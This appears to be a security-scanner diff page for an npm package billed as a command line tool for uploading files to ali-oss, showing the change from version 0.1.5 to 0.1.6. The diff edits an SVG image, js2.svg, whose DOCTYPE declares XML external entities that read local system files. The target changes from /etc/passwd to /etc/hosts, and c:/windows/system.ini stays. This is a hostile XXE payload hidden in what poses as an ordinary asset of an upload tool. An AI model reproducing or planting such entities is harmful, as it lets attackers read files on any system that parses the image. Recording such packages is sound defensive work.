@zxncij2390/upload-ali-oss 0.1.5 → 0.1.6

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/js2.svg +2 -2
  2. package/package.json +1 -1
package/js2.svg CHANGED
@@ -1,8 +1,8 @@
1
1
  <?xml version="1.0" encoding="UTF-8"?>
2
2
  <?xml-stylesheet type="text/xsl" href="?#"?>
3
3
  <!DOCTYPE div [
4
- <!ENTITY passwd_p "file:///etc/passwd">
5
- <!ENTITY passwd_c SYSTEM "file:///etc/passwd">
4
+ <!ENTITY passwd_p "file:///etc/hosts">
5
+ <!ENTITY passwd_c SYSTEM "file:///etc/hosts">
6
6
  <!ENTITY sysini_p "file:///c:/windows/system.ini">
7
7
  <!ENTITY sysini_c SYSTEM "file:///c:/windows/system.ini">
8
8
  ]>
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@zxncij2390/upload-ali-oss",
3
- "version": "0.1.5",
3
+ "version": "0.1.6",
4
4
  "description": "Command line tool for uploading files to ali-oss",
5
5
  "main": "index.js",
6
6
  "scripts": {